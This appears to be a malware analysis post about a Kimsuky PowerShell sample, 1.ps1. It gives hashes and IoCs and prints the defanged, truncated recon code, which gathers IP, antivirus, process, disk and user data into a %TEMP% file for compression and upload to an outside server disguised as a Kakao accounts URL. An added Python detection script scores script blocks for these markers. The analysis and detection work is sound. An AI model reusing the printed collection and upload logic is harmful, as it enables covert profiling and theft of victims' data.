PowerShell malware 1.ps1 made by Kimsuky (provisional name, 2025.3.13)
Today we look at 1.ps1 (provisional name, 2025.3.13), a PowerShell malware sample created by Kimsuky, one of the hacking groups under North Korea's Reconnaissance General Bureau and a North Korean APT organization.
Filename: 1.ps1
Size: 1 MB
MD5: 85f5075610661c9706571a33548d7585
SHA-1: bc36b9e8cf23dc0287f090a5c0bad3b391d00f86
SHA-256: 6ffb5106d912e582bde2c095365fa37a441741e4b9ea7f856b2ecad9516b74c2
The code is a simple PowerShell-based piece of malware; what stands out is that it contains a URL related to KakaoTalk, the national messenger that has also been at the center of a noisy censorship controversy in some quarters.
Malware content
$iPath = "$env:TEMP\processlist(.)txt";
$cPath = "$env:TEMP\disk(.)txt";
$uPath = "$env:TEMP\user(.)txt";
$sPath = "$env:TEMP\c_s(.)txt";
$ipPath = "$env:TEMP\ip(.)txt";
$oPath = "$env:TEMP\processlist(.)zip";
$oName = "abc_pl.zip";
$up_path = "htt"(+)"p://10"(+)"1.3"(+)"6.11"(+)"4(.)190/accou"(+)"nts(.)k"+"akao(.)comwe"(+)"blogin"(+)"find_acco"(+)"unt/sh"(+)"owHeader/"(+)"na"(+)"te(.)php";
$svbs = "$env:TEMP\dose(.)vbs";
if ([System.IO.File]::Exis(t)s($svbs)) {
remove-item $svbs -Force (-)Recurse -ErrorAction SilentlyContinue;
}
if ([System.IO(.)File]::Exists($sv(b)s)) {
remove-item $svbs -Force -Recur(s)e -ErrorAct(i)on Silen(t)lyContinue;
}
if ([System.IO(.)File]::Exists($oPath)) {
remove-item $oPath -Force -Recurse -ErrorA(c)tion Sil(e)ntlyContinue;
}
if ([System.IO.File]::Exists($i(P)ath)) {
remove-item $iPath -Force -Rec(u)rse -ErrorAction Silen(t)lyContinue;
}
Get-NetIP(A)ddress | Out-File -FileP(a)th $iPa(t)h -Append;
(Get-WmiObject -Names(p)ace root\SecurityCenter(2) -Class AntiVir(u)sProduct).disp(l)ayName | Out-File -Fi(l)ePath $iPath -Append;
Get-Process | Out-File -Fi(l)ePath $iPath -Append;
Get-WmiObject -Class Win32_Lo(g)icalDisk -Filter "(D)riveType=3" | Select-Object Devi(c)eID, VolumeName, @{Name="Size(GB)"; Expression={[math]::round($_(.)Size / 1GB, 2)}}, @{Name="Fr(e)eSpace(GB)"; Expr(e)ssion={[math]::round(()$_.FreeSpace / 1G(B), 2)}} | Out-File -FilePath $iPath -Append;
Get-LocalUser | Format-Li(s)t * | Out-File -FilePath $iPath -Append;
Get-WmiObject -Class Win3(2)_OperatingSystem | Select-Object ProductType | Out-File -FilePath $iPath -Append;
Compress-Archive …
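As an added example (not part of the original post or of the malware itself), the following Python triage script scores a PowerShell script block for the pattern seen above: several host-profiling cmdlets written to a %TEMP% staging file, a Compress-Archive step, and an upload URL built from split string pieces. It also joins the "a"+"b" fragments so the URL becomes readable for IoC extraction. The two embedded script blocks are constructed for the example, and 203.0.113.10 is a documentation-range placeholder, not the real upload server.

```python
import re
# Constructed sample mirroring the recon stage of 1.ps1 (not the real script;
# 203.0.113.10 is a documentation-range placeholder for the upload server).
SUSPICIOUS = r'''
$iPath = "$env:TEMP\processlist.txt";
$up_path = "htt"+"p://203.0.113.10"+"/find_acco"+"unt/showHeader/"+"nate.php";
Get-NetIPAddress | Out-File -FilePath $iPath -Append;
(Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName | Out-File -FilePath $iPath -Append;
Get-Process | Out-File -FilePath $iPath -Append;
Get-LocalUser | Format-List * | Out-File -FilePath $iPath -Append;
Compress-Archive -Path $iPath -DestinationPath "$env:TEMP\processlist.zip";
'''

# Constructed benign admin script: one inventory cmdlet plus an archive step.
BENIGN = r'''
Get-Process | Sort-Object CPU -Descending | Select-Object -First 5
Compress-Archive -Path C:\logs\*.log -DestinationPath C:\backup\logs.zip
'''

# Host-profiling cmdlets/WMI classes the sample appends to its staging file.
RECON_MARKERS = (
    "Get-NetIPAddress", "AntiVirusProduct", "Get-Process",
    "Win32_LogicalDisk", "Get-LocalUser", "Win32_OperatingSystem",
)
CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')  # matches "abc"+"def"

def join_concatenated_strings(text):
    """Collapse "a"+"b" into "ab" until stable, so split URLs read whole."""
    prev = None
    while prev != text:
        prev, text = text, CONCAT.sub(r'"\1\2"', text)
    return text

def analyze_script_block(text):
    """Score one PowerShell script block (e.g. the text of a 4104 event)."""
    lowered = text.lower()
    joined = join_concatenated_strings(text)
    result = {
        "recon_cmdlets": [m for m in RECON_MARKERS if m.lower() in lowered],
        "temp_staging": bool(re.search(r"\$env:TEMP\\", text, re.I)),
        "archive": "compress-archive" in lowered,
        "split_strings": len(CONCAT.findall(text)),
        "urls": re.findall(r"https?://[^\s\"';]+", joined, re.I),
    }
    # One point each: broad host profiling, %TEMP% staging, archiving, split strings.
    score = sum([len(result["recon_cmdlets"]) >= 3, result["temp_staging"],
                 result["archive"], result["split_strings"] > 0])
    result["score"], result["verdict"] = score, ("suspicious" if score >= 3 else "benign")
    return result
```

Run `analyze_script_block` over PowerShell script-block logging text; the sample scores 4 (suspicious) while the benign admin script scores 1.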
IoC
bc36b9e8cf23dc0287f090a5c0bad3b391d00f86
6ffb5106d912e582bde2c095365fa37a441741e4b9ea7f856b2ecad9516b74c2
85f5075610661c9706571a33548d7585